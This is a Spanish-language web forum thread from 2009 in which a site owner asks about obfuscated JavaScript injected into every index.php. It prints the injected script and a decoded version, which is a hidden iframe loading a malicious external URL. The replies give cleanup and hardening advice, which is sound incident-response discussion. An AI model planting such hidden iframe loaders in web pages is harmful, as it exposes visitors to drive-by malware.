Foros del Web » Creando para Internet » Diseño web »

Muy urgente y no es broma

Estas en el tema de Muy urgente y no es broma en el foro de Diseño web en Foros del Web. Pues algunos usuarios de mi web decian queponia que este servidor puede dañar el ordenador, despues al ir al ftp me encontrado esto en cada ...
  #1 (permalink)  
Antiguo 15/05/2009, 17:24
 
Fecha de Ingreso: mayo-2008
Mensajes: 315
Antigüedad: 9 años, 7 meses
Puntos: 7
Muy urgente y no es broma

Pues algunos usuarios de mi web decian queponia que este servidor puede dañar el ordenador, despues al ir al ftp me encontrado esto en cada index.php

<!-- o --><script>var lwa="<";var elg="i";var fqqjq=" ";var ciplw="ufebm='waZLSyhB' tvtbx='Fwcn7bA0' krcxm='AH3GIdbg' twnko='BA25NRUb' src=";var pzkly="ame>";var kimdl="/tds/go.php?sid=3&lucky";var vtnqi="?wDjQqTk ";var wzn="f";var pkc="r";var ymq="a";var rqdre="wjjyi='P9wpLXPG' dxcip='ajZFAHUy' dnria='bdY3F5Nu' egafm='fMswiX72' gyicy='i4DpByrB' cnbfx='q60biqDw' ";var azz="m";var ukp="e";var mntra="width=671 ";var oqnaf="http://llforyourpets.net";var dexlv="height=315 ";var ybnmr="style='display:none'";var ybooc=oqnaf+kimdl;var uydmn="></ifr";document.write(lwa+elg+wzn+pkc+ymq+azz+ukp+fq qjq+ciplw+ybooc+vtnqi+rqdre+mntra+dexlv+ybnmr+uydm n+pzkly);</script><!-- c -->

Que es
ayuda pr favor
  #2 (permalink)  
Antiguo 15/05/2009, 17:30
 
Fecha de Ingreso: mayo-2008
Mensajes: 793
Antigüedad: 9 años, 6 meses
Puntos: 13
Respuesta: Muy urgente y no es broma

Parece un codigo que te han inyectado.

Fijate la extension del archivo en que encontraste esto y luego revisa todos los archivos con la misma extension, ya que generalmente asi se instalan esos codigos.

Y si una vez que lo quitas de todos los archivos te vuelve a aparecer, estamos en problemas...
__________________
Publicidad
Noticias de Tecnologia
  #3 (permalink)  
Antiguo 15/05/2009, 17:33
Colaborador
 
Fecha de Ingreso: junio-2007
Mensajes: 5.798
Antigüedad: 10 años, 6 meses
Puntos: 538
Respuesta: Muy urgente y no es broma

Hola Totolia
Cuando en las normas se pide poner títulos descriptivos y escapar de los "ayuda", "muy urgente" es por algún motivo.

Tiene toda la pinta de ser un código inyectado. ¿Vírus? por el aviso podría ser. Hay servidores gratuitos que también colocan su código en tu página.

Te tocará limpiar todo tus códigos y descubrir cuando te lo inyectan, si es en local al hacer tus páginas o si lo tienes en tu servidor.

Quizás te puedan brindar mejor ayuda en el foro de "virus".
__________________
Por una web con mucho estilo
+++ CUENTA ABANDONADA. ¿la quieres? +++
  #4 (permalink)  
Antiguo 15/05/2009, 17:38
 
Fecha de Ingreso: mayo-2008
Mensajes: 315
Antigüedad: 9 años, 7 meses
Puntos: 7
Respuesta: Muy urgente y no es broma

Joder pues estoy cagao, es una web de pago, no es un server gratis, podria ser a causa de un keylogger
  #5 (permalink)  
Antiguo 15/05/2009, 17:39
 
Fecha de Ingreso: mayo-2008
Mensajes: 315
Antigüedad: 9 años, 7 meses
Puntos: 7
Respuesta: Muy urgente y no es broma

Si cambio la contraseÑa desde otra pc del ftp, etc, y lo limpio ya no pasaria verdad
  #6 (permalink)  
Antiguo 15/05/2009, 17:54
 
Fecha de Ingreso: mayo-2008
Mensajes: 315
Antigüedad: 9 años, 7 meses
Puntos: 7
Respuesta: Muy urgente y no es broma

creo que ya lo e solucionado, como estoy seguro de saberlo, e rebisado las pganias e cambiado la ftp, cp, etc. y loe limpiado, hay alguna manera de estar mas seguro. Lo he hecho desde el ipod asi que supongo k ya estara todo bien
  #7 (permalink)  
Antiguo 15/05/2009, 18:39
 
Fecha de Ingreso: mayo-2008
Mensajes: 793
Antigüedad: 9 años, 6 meses
Puntos: 13
Respuesta: Muy urgente y no es broma

Cita:
Iniciado por totolia Ver Mensaje
creo que ya lo e solucionado, como estoy seguro de saberlo, e rebisado las pganias e cambiado la ftp, cp, etc. y loe limpiado, hay alguna manera de estar mas seguro. Lo he hecho desde el ipod asi que supongo k ya estara todo bien

Generalmente los exploits o inyecciones no se solucionan tan facilmente.

Pero ojala que no haya sido eso y se te solucione el problema.
Asegurate de limpiar "Todos" los archivos de tu web, asegurate de sacarlo por completo.

Saludos...
__________________
Publicidad
Noticias de Tecnologia
  #8 (permalink)  
Antiguo 15/05/2009, 18:48
Avatar de zaetoner  
Fecha de Ingreso: noviembre-2007
Ubicación: La ciudad de México
Mensajes: 607
Antigüedad: 10 años
Puntos: 30
Respuesta: Muy urgente y no es broma

inyecciones. eso pasa de manera mas comun de lo que crees y en realidad se solucionan muy facil, solo ponte en contacto con tu proveedor de host y ellos entenderan el problema rapido
ya que esta en juego su reputacion, lo que haran sera cambiar tu cuenta a otro servidor (talvez con otra ip) y limpiar las cuentas. ojala y que ya lo ayas solucionado suerte!
  #9 (permalink)  
Antiguo 15/05/2009, 19:30
Avatar de jcxnet  
Fecha de Ingreso: octubre-2005
Ubicación: Perú
Mensajes: 784
Antigüedad: 12 años, 2 meses
Puntos: 56
Respuesta: Muy urgente y no es broma

lo que hace el código ese es escribir lo siguiente:
Código HTML:
<iframe ufebm='waZLSyhB' tvtbx='Fwcn7bA0' krcxm='AH3GIdbg' twnko='BA25NRUb' src="http://llforyourpets.net/tds/go.php?sid=3&lucky?wDjQqTk wjjyi='P9wpLXPG' dxcip='ajZFAHUy' dnria='bdY3F5Nu' egafm='fMswiX72' gyicy='i4DpByrB' cnbfx='q60biqDw' width=671 height=315 style='display:none'></iframe> 
lanza un iframe oculto que apunta hacia una web infectada.
__________________
►I'm a devil on the run ♂
Jcxnet.com
*Keep It Simple **
  #10 (permalink)  
Antiguo 15/05/2009, 22:46
Avatar de PatomaS
Colaborador
 
Fecha de Ingreso: marzo-2004
Ubicación: En alguna otra parte
Mensajes: 4.656
Antigüedad: 13 años, 9 meses
Puntos: 63
Respuesta: Muy urgente y no es broma

Hola

El que hayas solucionado el problema por ahora está muy bien, sin embargo, hay tres elementos que considerar aquí.

1. Tu seguridad es muy baja.
2. La seguridad de tu servidor web (de pago) es muy baja (esto es muy grave)
3. El título de este tema es totalmente inadecuado.

Así que deberás ponerte lo antes posible a remediar los problemas.

EL 1 ya lo empezaste a hacer, pero deberías también considerar opciones como modificar los permisos de acceso y escritura a los archivos, al menos para empezar. El segundo punto, debes comunicarte con tu servidor y decirles lo que ha pasado para que remedien sus fallos.

Felicidad
__________________
¡ hey, hou, hou, hey !
  #11 (permalink)  
Antiguo 18/05/2009, 21:20
 
Fecha de Ingreso: febrero-2007
Mensajes: 232
Antigüedad: 10 años, 9 meses
Puntos: 0
Respuesta: Muy urgente y no es broma

Lo suyo es ver la fecha de modificación de los ficheros, con esa informacion ir a los logs ftp y logs web y ver si la inyección es:

Por que tienen la clave de tu ftp y suben de nuevo el fichero "infectado"
O que a través de alguna vulnerabilidad de tu código o de tu servidor acceden al fichero y te lo modifican.

Suerte amigo.
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 13:57.